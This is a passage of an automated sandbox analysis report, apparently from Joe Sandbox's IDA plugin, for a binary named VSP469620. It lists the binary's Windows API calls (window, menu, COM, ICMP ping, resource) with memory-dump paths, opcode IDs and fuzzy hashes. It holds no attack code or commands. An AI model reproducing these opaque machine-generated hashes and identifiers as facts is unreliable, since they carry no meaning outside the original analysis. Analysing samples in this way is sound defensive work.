                                                              • DeleteDC.GDI32(00000000), ref: 00B1A28F
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00B1A299
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B1A2AD
                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B1A2B9
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                              • String ID: static
                                                              • API String ID: 2559357485-2160076837
                                                              • Opcode ID: 3b7380ea72d8e2161fde134f932d4b7c6d8aa39fff2b32fd226c326afdb8230e
                                                              • Instruction ID: 649b046d5b6423e54d511418d5cbd1f3ce67520fbc4297895ec68d99a0d64437
                                                              • Opcode Fuzzy Hash: 3b7380ea72d8e2161fde134f932d4b7c6d8aa39fff2b32fd226c326afdb8230e
                                                              • Instruction Fuzzy Hash: 3A317031101215BBDF115FB4EC49FDE3BA9FF09760F210214FA29A61A0CB35E861DBA5
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              • API String ID: 2620052-3771769585
                                                              • Opcode ID: 930965547783d28402384722c6c534ac41ebb9596f312cdbb561397ee1812bf0
                                                              • Instruction ID: 30fe34bab995717bcf6e4df263f5caa18eccbd9006db401294ec9693e6dca608
                                                              • Opcode Fuzzy Hash: 930965547783d28402384722c6c534ac41ebb9596f312cdbb561397ee1812bf0
                                                              • Instruction Fuzzy Hash: 18110671504119AFCB24ABB0AD4AEEE77BCEF40710F1001AAF245A7091EF70DE818B50
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AD5047
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              • __gmtime64_s.LIBCMT ref: 00AD50E0
                                                              • __gmtime64_s.LIBCMT ref: 00AD5116
                                                              • __gmtime64_s.LIBCMT ref: 00AD5133
                                                              • __allrem.LIBCMT ref: 00AD5189
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD51A5
                                                              • __allrem.LIBCMT ref: 00AD51BC
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD51DA
                                                              • __allrem.LIBCMT ref: 00AD51F1
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD520F
                                                              • __invoke_watson.LIBCMT ref: 00AD5280
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                              • String ID:
                                                              • API String ID: 384356119-0
                                                              • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                              • Instruction ID: 0fe121124c70b016bcb5fade2f7ba821373b1c0387332502154216d726f6deeb
                                                              • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                              • Instruction Fuzzy Hash: F971C472E00B16ABE714AF79CD41BAAB3A8AF14764F14422BF512DA381E770DD448BD0
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AF4DF8
                                                              • GetMenuItemInfoW.USER32(00B71708,000000FF,00000000,00000030), ref: 00AF4E59
                                                              • SetMenuItemInfoW.USER32(00B71708,00000004,00000000,00000030), ref: 00AF4E8F
                                                              • Sleep.KERNEL32(000001F4), ref: 00AF4EA1
                                                              • GetMenuItemCount.USER32(?), ref: 00AF4EE5
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00AF4F01
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00AF4F2B
                                                              • GetMenuItemID.USER32(?,?), ref: 00AF4F70
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AF4FB6
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF4FCA
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF4FEB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                              • String ID:
                                                              • API String ID: 4176008265-0
                                                              • Opcode ID: bf03fd3d781efaa0d7edd78a33fc9c333298e1cda2e048417a1161bcba1f438b
                                                              • Instruction ID: 2e34d62fe241b0c25457c7e455b305b9dd43b8adcb02a360463062908786a60c
                                                              • Opcode Fuzzy Hash: bf03fd3d781efaa0d7edd78a33fc9c333298e1cda2e048417a1161bcba1f438b
                                                              • Instruction Fuzzy Hash: BA618B7190024DAFDB21CFA8D988ABF7BB8FB49718F140559F646A7251DB30AD45CB20
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B19C98
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B19C9B
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00B19CBF
                                                              • _memset.LIBCMT ref: 00B19CD0
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B19CE2
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B19D5A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow_memset
                                                              • String ID:
                                                              • API String ID: 830647256-0
                                                              • Opcode ID: 8f54328e3cc83ad70fc1fcf521b8cf1f616773d18768c7509ee3cd9232c02cf8
                                                              • Instruction ID: be0e65a4cd87331075a9b751d2607205bf7a62cbeb82233154af91f2cadcde83
                                                              • Opcode Fuzzy Hash: 8f54328e3cc83ad70fc1fcf521b8cf1f616773d18768c7509ee3cd9232c02cf8
                                                              • Instruction Fuzzy Hash: 6E618D75900248AFDB10CFA8CC81EEE77F8EB09700F14459AFA15E7291D770AA82DB60
                                                              APIs
                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00AE94FE
                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00AE9549
                                                              • VariantInit.OLEAUT32(?), ref: 00AE955B
                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AE957B
                                                              • VariantCopy.OLEAUT32(?,?), ref: 00AE95BE
                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AE95D2
                                                              • VariantClear.OLEAUT32(?), ref: 00AE95E7
                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00AE95F4
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AE95FD
                                                              • VariantClear.OLEAUT32(?), ref: 00AE960F
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AE961A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                              • String ID:
                                                              • API String ID: 2706829360-0
                                                              • Opcode ID: a7ef9d6f1ae5289c2e683c1c41bf64bbecc4bd8a65bf8360a18f913fcea9ea56
                                                              • Instruction ID: 9d59081e32fe8bc9465ba438472df22cd7019aa72d8684d255de1918d7bc3cc1
                                                              • Opcode Fuzzy Hash: a7ef9d6f1ae5289c2e683c1c41bf64bbecc4bd8a65bf8360a18f913fcea9ea56
                                                              • Instruction Fuzzy Hash: DA413D71900219AFCB01EFA9E884DDEBB79FF08354F108069F516A7261DB71EA45CBA1
                                                              APIs
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • CoInitialize.OLE32 ref: 00B0ADF6
                                                              • CoUninitialize.OLE32 ref: 00B0AE01
                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00B3D8FC,?), ref: 00B0AE61
                                                              • IIDFromString.OLE32(?,?), ref: 00B0AED4
                                                              • VariantInit.OLEAUT32(?), ref: 00B0AF6E
                                                              • VariantClear.OLEAUT32(?), ref: 00B0AFCF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                              • API String ID: 834269672-1287834457
                                                              • Opcode ID: c5eaf3d8e4b34b7336320bec7f458d08309fea564dc37c7703cf1a171953af56
                                                              • Instruction ID: 9c60733b666150773d480ba1a800572a94ec60b2071b60e905d34ff1cccd566b
                                                              • Opcode Fuzzy Hash: c5eaf3d8e4b34b7336320bec7f458d08309fea564dc37c7703cf1a171953af56
                                                              • Instruction Fuzzy Hash: BB617A71208312AFC710EF54D988B6EBBE8EF48714F204899F9859B2D1CB70ED44CB92
                                                              APIs
                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00B08168
                                                              • inet_addr.WSOCK32(?,?,?), ref: 00B081AD
                                                              • gethostbyname.WSOCK32(?), ref: 00B081B9
                                                              • IcmpCreateFile.IPHLPAPI ref: 00B081C7
                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B08237
                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B0824D
                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B082C2
                                                              • WSACleanup.WSOCK32 ref: 00B082C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                              • String ID: Ping
                                                              • API String ID: 1028309954-2246546115
                                                              • Opcode ID: 60d4a200b6bef73ad13d7cea130e9eec739eb82074761cbbfb3c0147ac7991ca
                                                              • Instruction ID: a2b819c0d6fa44c192c36a50f0ff129f7c00014af705759734da6df58b0eb4b1
                                                              • Opcode Fuzzy Hash: 60d4a200b6bef73ad13d7cea130e9eec739eb82074761cbbfb3c0147ac7991ca
                                                              • Instruction Fuzzy Hash: E0517F316047009FD7209F64DD85B6ABBE5EF48720F148969FA95AB2E1DF70EA01CB41
                                                              APIs
                                                              • _memset.LIBCMT ref: 00B19E5B
                                                              • CreateMenu.USER32 ref: 00B19E76
                                                              • SetMenu.USER32(?,00000000), ref: 00B19E85
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B19F12
                                                              • IsMenu.USER32(?), ref: 00B19F28
                                                              • CreatePopupMenu.USER32 ref: 00B19F32
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B19F63
                                                              • DrawMenuBar.USER32 ref: 00B19F71
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                              • String ID: 0
                                                              • API String ID: 176399719-4108050209
                                                              • Opcode ID: a4fbe1494787d204d1c13c3a1b24dce25cc2f823728b7cb43107e32597052312
                                                              • Instruction ID: fa7f9f3584f7fa57cb4e694292096a56b2029b74f2c00519f3ac4ee287723d4d
                                                              • Opcode Fuzzy Hash: a4fbe1494787d204d1c13c3a1b24dce25cc2f823728b7cb43107e32597052312
                                                              • Instruction Fuzzy Hash: 65417879A00209AFDB10DF68E894BEABBF5FF48304F244069F946A7360DB30A954CF50
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 00AFE396
                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00AFE40C
                                                              • GetLastError.KERNEL32 ref: 00AFE416
                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00AFE483
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                              • API String ID: 4194297153-14809454
                                                              • Opcode ID: 96ab182982c5f3c9601b4d41f8e5a4854c63fa0bf93fe41af98927b37cad536b
                                                              • Instruction ID: 5868fb70739d5adaed9c80ba604ce4dcd0a8e8542f1deb8a7027ae7c72e77438
                                                              • Opcode Fuzzy Hash: 96ab182982c5f3c9601b4d41f8e5a4854c63fa0bf93fe41af98927b37cad536b
                                                              • Instruction Fuzzy Hash: C6319435A0020D9FDB11EFA4D945FBDB7F8EF44701F148069F605A72A2DB769901C791
                                                              APIs
                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AEB98C
                                                              • GetDlgCtrlID.USER32 ref: 00AEB997
                                                              • GetParent.USER32 ref: 00AEB9B3
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AEB9B6
                                                              • GetDlgCtrlID.USER32(?), ref: 00AEB9BF
                                                              • GetParent.USER32(?), ref: 00AEB9DB
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AEB9DE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1383977212-1403004172
                                                              • Opcode ID: 417e7dc988984aefce4e078873be361502885ca5719138d601b3e85ba1d640af
                                                              • Instruction ID: 4c40e621607e88bc71422d7184a8fc52beb11d73f190018136bb0e3b78b8ba91
                                                              • Opcode Fuzzy Hash: 417e7dc988984aefce4e078873be361502885ca5719138d601b3e85ba1d640af
                                                              • Instruction Fuzzy Hash: B821C574900104BFDB05ABA5DC86EFEBBB9EF4A310F100119F661972E2DB799815DB70
                                                              APIs
                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AEBA73
                                                              • GetDlgCtrlID.USER32 ref: 00AEBA7E
                                                              • GetParent.USER32 ref: 00AEBA9A
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AEBA9D
                                                              • GetDlgCtrlID.USER32(?), ref: 00AEBAA6
                                                              • GetParent.USER32(?), ref: 00AEBAC2
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AEBAC5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1383977212-1403004172
                                                              • Opcode ID: 5b747467a065650e8abd732d8a1ac966746df2155a19951eb8c01c8ce08baa8c
                                                              • Instruction ID: 6c11f9d57cea248056a6e10ad02613272daa53efe03695d3012de90787fcc75b
                                                              • Opcode Fuzzy Hash: 5b747467a065650e8abd732d8a1ac966746df2155a19951eb8c01c8ce08baa8c
                                                              • Instruction Fuzzy Hash: D621B374900144BFDF00ABA5DC86EFEB7B9EF45300F100015F561931A2DB7999159B30
                                                              APIs
                                                              • GetParent.USER32 ref: 00AEBAE3
                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00AEBAF8
                                                              • _wcscmp.LIBCMT ref: 00AEBB0A
                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AEBB85
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                              • API String ID: 1704125052-3381328864
                                                              • Opcode ID: 6ef779769065aa3cb4f4681a988b04995eb9c2b6aaaf165f817b0935d4a95dc6
                                                              • Instruction ID: 4af08885dfc8d5ab50c16c9ec0cea68b8674fe3a59ed1e18da572f10dadaff7d
                                                              • Opcode Fuzzy Hash: 6ef779769065aa3cb4f4681a988b04995eb9c2b6aaaf165f817b0935d4a95dc6
                                                              • Instruction Fuzzy Hash: D3112976618743FEFA206731EC0BDA737ACDB15724F300022F955E50E9FFA5A9114524
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00B0B2D5
                                                              • CoInitialize.OLE32(00000000), ref: 00B0B302
                                                              • CoUninitialize.OLE32 ref: 00B0B30C
                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00B0B40C
                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B0B539
                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00B0B56D
                                                              • CoGetObject.OLE32(?,00000000,00B3D91C,?), ref: 00B0B590
                                                              • SetErrorMode.KERNEL32(00000000), ref: 00B0B5A3
                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B0B623
                                                              • VariantClear.OLEAUT32(00B3D91C), ref: 00B0B633
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                              • String ID:
                                                              • API String ID: 2395222682-0
                                                              • Opcode ID: 99610508097685222ea7f12f4e2188b8516becf9bc39b2608f3b74d101f2efd8
                                                              • Instruction ID: caaaef32a1f72c3db08f7841a223b1e41659a7f83ce79123b975bf4f455d2bd1
                                                              • Opcode Fuzzy Hash: 99610508097685222ea7f12f4e2188b8516becf9bc39b2608f3b74d101f2efd8
                                                              • Instruction Fuzzy Hash: 8BC10171608301AFC700DF64D894E6ABBE9FF88708F14499DF58A9B2A1DB71ED05CB52
                                                              APIs
                                                              • __swprintf.LIBCMT ref: 00AF67FD
                                                              • __swprintf.LIBCMT ref: 00AF680A
                                                                • Part of subcall function 00AD172B: __woutput_l.LIBCMT ref: 00AD1784
                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00AF6834
                                                              • LoadResource.KERNEL32(?,00000000), ref: 00AF6840
                                                              • LockResource.KERNEL32(00000000), ref: 00AF684D
                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 00AF686D
                                                              • LoadResource.KERNEL32(?,00000000), ref: 00AF687F
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00AF688E
                                                              • LockResource.KERNEL32(?), ref: 00AF689A
                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00AF68F9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                              • String ID:
                                                              • API String ID: 1433390588-0
                                                              • Opcode ID: dc26021bbe4df8c59bac7e06720687c9aeacde07a2e4cbd060007f59a3ef0847
                                                              • Instruction ID: d6ca7a8b5027927934781510206ef33a6f02329bacd977e681cbcfa61b2b65db
                                                              • Opcode Fuzzy Hash: dc26021bbe4df8c59bac7e06720687c9aeacde07a2e4cbd060007f59a3ef0847
                                                              • Instruction Fuzzy Hash: FC315E7190021AABDB119FA1ED55EBF7BA8FF08381F104429FA16E3150EB74D951DBB0
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00AF4047
                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AF30A5,?,00000001), ref: 00AF405B
